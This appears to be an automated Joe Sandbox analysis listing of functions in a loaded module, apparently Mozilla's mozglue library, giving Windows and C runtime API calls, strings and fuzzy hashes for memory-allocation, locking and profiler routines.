                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 2538299546-0
                                                                  • Opcode ID: 2b555c7e693f190d38ddd76dbd6e93af32143655e536f95a87dd6e71a8c9a3d6
                                                                  • Instruction ID: 033924f019063a68a0cd2e9055a990dad38d6d3e5dc9d5550b919855e5d285f8
                                                                  • Opcode Fuzzy Hash: 2b555c7e693f190d38ddd76dbd6e93af32143655e536f95a87dd6e71a8c9a3d6
                                                                  • Instruction Fuzzy Hash: 0111B6B19052256BD710AF7ACC44B6F7EFCEF55754F144529F888A7300E774984487E2
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C8C3DEF), ref: 6C900D71
                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C8C3DEF), ref: 6C900D84
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C8C3DEF), ref: 6C900DAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Free$Alloc
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 1852963964-2186867486
                                                                  • Opcode ID: 6384855174ee29bf2d37c23c0d8baffdd261d06d44ee64f22d3dad351e14d6d6
                                                                  • Instruction ID: 4d9ff8e23f29ca2a5c161cfff0081258d9c7b32d6b64d5b2a2e66a58dc9a2c1e
                                                                  • Opcode Fuzzy Hash: 6384855174ee29bf2d37c23c0d8baffdd261d06d44ee64f22d3dad351e14d6d6
                                                                  • Instruction Fuzzy Hash: 48F0893238479423E72439665C0AB6E276D67C2B65F34D07AF608DA9C0DA60E410CBB5
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C9175C4,?), ref: 6C91762B
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C9174D7,6C9215FC,?,?,?), ref: 6C917644
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91765A
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9174D7,6C9215FC,?,?,?), ref: 6C917663
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C9174D7,6C9215FC,?,?,?), ref: 6C917677
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 418114769-0
                                                                  • Opcode ID: ddb8a7ad392218df4dbede5cc8ced1d9172ad82d32549095ff1841d766dfb20c
                                                                  • Instruction ID: 678b862e5b01ed747b1308e14def27040eedef2d09721795ee17904039418283
                                                                  • Opcode Fuzzy Hash: ddb8a7ad392218df4dbede5cc8ced1d9172ad82d32549095ff1841d766dfb20c
                                                                  • Instruction Fuzzy Hash: 39F0C871E14745ABD7009F31C848A7AB778FFEA259F218356F90543601E7B0A5D087D0
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C921800
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                    • Part of subcall function 6C8C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C903EBD,6C903EBD,00000000), ref: 6C8C42A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                  • String ID: Details$name${marker.name} - {marker.data.name}
                                                                  • API String ID: 46770647-1733325692
                                                                  • Opcode ID: eaa9945f35a782d8e44ff5a9490c56070c82f0130d97e46d2004a6ff695b3816
                                                                  • Instruction ID: 335ff62bf91a2c58fe49b98f7f6d70d7f6987cd0d667cce0318f39683f271559
                                                                  • Opcode Fuzzy Hash: eaa9945f35a782d8e44ff5a9490c56070c82f0130d97e46d2004a6ff695b3816
                                                                  • Instruction Fuzzy Hash: 5F710370A043069FCB04DF28D5507AABBB5FF86318F10866DD8554BB41D771EAA8CBE2
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,6C92B0A6,6C92B0A6,?,6C92AF67,?,00000010,?,6C92AF67,?,00000010,00000000,?,?,6C92AB1F), ref: 6C92B1F2
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C92B0A6,6C92B0A6,?,6C92AF67,?,00000010,?,6C92AF67,?,00000010,00000000,?), ref: 6C92B1FF
                                                                  • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C92B0A6,6C92B0A6,?,6C92AF67,?,00000010,?,6C92AF67,?,00000010), ref: 6C92B25F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$Xlength_error@std@@
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 1922495194-1285458680
                                                                  • Opcode ID: f04dc9dcd8257b59258078dacc168140a44ddc930e3a49ad86af1ed92a86f222
                                                                  • Instruction ID: de09cd176b10ff03d089958716886f437b31569e312d0852ec8e67a28a69be8b
                                                                  • Opcode Fuzzy Hash: f04dc9dcd8257b59258078dacc168140a44ddc930e3a49ad86af1ed92a86f222
                                                                  • Instruction Fuzzy Hash: 6A61BC346142458FD701CF19C880A9ABBF5FF5A318F28C5A9D89A4FB1AC335ED45CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                  • EnterCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED50B
                                                                    • Part of subcall function 6C8CCFE0: EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8CCFF6
                                                                    • Part of subcall function 6C8CCFE0: LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8CD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED52E
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C8ED690
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C8FD1C5), ref: 6C8ED751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 3805649505-2608361144
                                                                  • Opcode ID: dbaec62104048db6562edd2c07e719e45016ae0f83498e834f37915b3adbba8a
                                                                  • Instruction ID: f436774a0019a22955ac728dc98ddbac4f8db2361280658bc80897d08e9c3904
                                                                  • Opcode Fuzzy Hash: dbaec62104048db6562edd2c07e719e45016ae0f83498e834f37915b3adbba8a
                                                                  • Instruction Fuzzy Hash: 8651C171A087058FD324DF29C69461AB7F1EBCA718F248D2ED5AAC7B85D770E804CB91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 3732870572-2661126502
                                                                  • Opcode ID: 9906fd6d38eafd524a4543a34baa6dfa4273f39f607025880b9b9d8d12a70a5c
                                                                  • Instruction ID: 3219cd0e833b9b2a8cd294b92b4acac250a7006c27dc06eedd24495bc5f96b33
                                                                  • Opcode Fuzzy Hash: 9906fd6d38eafd524a4543a34baa6dfa4273f39f607025880b9b9d8d12a70a5c
                                                                  • Instruction Fuzzy Hash: 01413971A087099BC708DF78D85215EB7F9EF8975CF208A3DE8595BB81E730D8448B51
                                                                  APIs
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C93985D
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C93987D
                                                                  • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C9398DE
                                                                  Strings
                                                                  • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C9398D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                  • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                  • API String ID: 1778083764-3290996778
                                                                  • Opcode ID: 5fcd4613129f32adc02799a4068e7b3e975b33abc62d3bc9f5d23059ac0db8e4
                                                                  • Instruction ID: 2ff0414326d369c80ea89b59211259c5d1558e5644e55e6b7a3c6efe6f296543
                                                                  • Opcode Fuzzy Hash: 5fcd4613129f32adc02799a4068e7b3e975b33abc62d3bc9f5d23059ac0db8e4
                                                                  • Instruction Fuzzy Hash: 82313871B002086FDB24AF5CD8445EF77A8DF84358F10847DEA2A9B740CB3099058BE1
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 6C914721
                                                                    • Part of subcall function 6C8C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C903EBD,00000017,?,00000000,?,6C903EBD,?,?,6C8C42D2), ref: 6C8C4444
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 680628322-2661126502
                                                                  • Opcode ID: 3bc2b30897bf8d9755366499291a01bf6cd643ee308c23269d595fdab0b9862d
                                                                  • Instruction ID: 5375de97414df7bbb5b503403b0deacbfb0fc98f2cedb545f1845f38ba16695d
                                                                  • Opcode Fuzzy Hash: 3bc2b30897bf8d9755366499291a01bf6cd643ee308c23269d595fdab0b9862d
                                                                  • Instruction Fuzzy Hash: 57314B71F083085BCB0CDF6CD8822AEBBE6DB89718F14853DE8159BB41EB70D9048B50
                                                                  APIs
                                                                    • Part of subcall function 6C8C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C903EBD,6C903EBD,00000000), ref: 6C8C42A9
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C91B127), ref: 6C91B463
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C91B4C9
                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C91B4E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                  • String ID: pid:
                                                                  • API String ID: 1720406129-3403741246
                                                                  • Opcode ID: 44db7359401387014df1efe31f2d5d7a44fc368a55192145b33bbad7b10a3541
                                                                  • Instruction ID: 5b6bf547822e0f2b7016db9694a3cde2d535219ebe382dafa5f6e81576dda4d0
                                                                  • Opcode Fuzzy Hash: 44db7359401387014df1efe31f2d5d7a44fc368a55192145b33bbad7b10a3541
                                                                  • Instruction Fuzzy Hash: A53115B1A05209CFDB10DFAAD881AEEB7BABF45308F54452DD811A7F81D731E845CBA1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90E577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90E584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90E5DE
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C90E8A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                  • API String ID: 1483687287-53385798
                                                                  • Opcode ID: 2c39d2732aa2a3e21e9206251a30c6a41eb4186e1589dcf9c472daa81d4b7baf
                                                                  • Instruction ID: 06c15d40d6094703322324dafd9fc49b42a167bc1d689273e596cbca6a9beed9
                                                                  • Opcode Fuzzy Hash: 2c39d2732aa2a3e21e9206251a30c6a41eb4186e1589dcf9c472daa81d4b7baf
                                                                  • Instruction Fuzzy Hash: D911A131708755DFCB00AF14C448A6ABBF8FBC932CF648619E89547A50DB70E805CBD5
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C910CD5
                                                                    • Part of subcall function 6C8FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8FF9A7
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C910D40
                                                                  • free.MOZGLUE ref: 6C910DCB
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  • free.MOZGLUE ref: 6C910DDD
                                                                  • free.MOZGLUE ref: 6C910DF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                  • String ID:
                                                                  • API String ID: 4069420150-0
                                                                  • Opcode ID: 41ca4f0a85bbaa98a47de1b994b6f91fe645ac3fb8939338c6f3720c67b51f89
                                                                  • Instruction ID: 8f7a1b8996d699b94434521c78648a5a428e473cee4fcca007b36f24c9f6f0d5
                                                                  • Opcode Fuzzy Hash: 41ca4f0a85bbaa98a47de1b994b6f91fe645ac3fb8939338c6f3720c67b51f89
                                                                  • Instruction Fuzzy Hash: B941257591C7848BD320CF29C1817AAFBE5BF99714F109A2EE8D887B50DB70D455CB82
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C900838
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C90084C
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9008AF
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9008BD
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C9008D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset
                                                                  • String ID:
                                                                  • API String ID: 837921583-0
                                                                  • Opcode ID: 95e2b5f16b995ac9edc8cf31fea05dd0c105fc040772898c85ab0beb84deaa67
                                                                  • Instruction ID: 1d5912aadb2a28e7cdc4bad9d43d3637f3ac62b5223c5b46563b2ea6384b64bb
                                                                  • Opcode Fuzzy Hash: 95e2b5f16b995ac9edc8cf31fea05dd0c105fc040772898c85ab0beb84deaa67
                                                                  • Instruction Fuzzy Hash: D721C231B092498BEF04DF65D844BAEB7B9BF8571CF6045ACD909A7A40DF32E8048BD0
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91CDA4
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                    • Part of subcall function 6C91D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C91CDBA,00100000,?,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91D158
                                                                    • Part of subcall function 6C91D130: InitializeConditionVariable.KERNEL32(00000098,?,6C91CDBA,00100000,?,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91D177
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91CDC4
                                                                    • Part of subcall function 6C917480: ReleaseSRWLockExclusive.KERNEL32(?,6C9215FC,?,?,?,?,6C9215FC,?), ref: 6C9174EB
                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91CECC
                                                                    • Part of subcall function 6C8DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C8DCAA2
                                                                    • Part of subcall function 6C90CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C91CEEA,?,?,?,?,00000000,?,6C90DA31,00100000,?,?,00000000), ref: 6C90CB57
                                                                    • Part of subcall function 6C90CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C90CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C91CEEA,?,?), ref: 6C90CBAF
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C90DA31,00100000,?,?,00000000,?), ref: 6C91D058
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                  • String ID:
                                                                  • API String ID: 861561044-0
                                                                  • Opcode ID: 3236ec8f130a7146adefb71330c89c889981814a0178e9259e56f70dadadf95e
                                                                  • Instruction ID: a8786ebf7122edd2463d241f8cbedaac86e284d119d513954e52c452dd59dbbe
                                                                  • Opcode Fuzzy Hash: 3236ec8f130a7146adefb71330c89c889981814a0178e9259e56f70dadadf95e
                                                                  • Instruction Fuzzy Hash: CCD18071A08B46DFD708CF28C5817A9F7E1BF99308F01862DD85987B11EB31E965CB81
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C8D17B2
                                                                  • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C8D18EE
                                                                  • free.MOZGLUE(?), ref: 6C8D1911
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8D194C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3725304770-0
                                                                  • Opcode ID: d853a08a1dc8d694f199d824df57edf7f840c27319f0f212aacc121f2d6ca1dc
                                                                  • Instruction ID: 2acdc5004b4aa0f51a3c25ccd859f31f5fc9839c8f881bf38efe939923bae720
                                                                  • Opcode Fuzzy Hash: d853a08a1dc8d694f199d824df57edf7f840c27319f0f212aacc121f2d6ca1dc
                                                                  • Instruction Fuzzy Hash: DB81D170A142159FCB18CF68D9C49AEBBB1FF89324F05496CE815AB754DB30F844CBA2
                                                                  APIs
                                                                  • GetTickCount64.KERNEL32 ref: 6C8E5D40
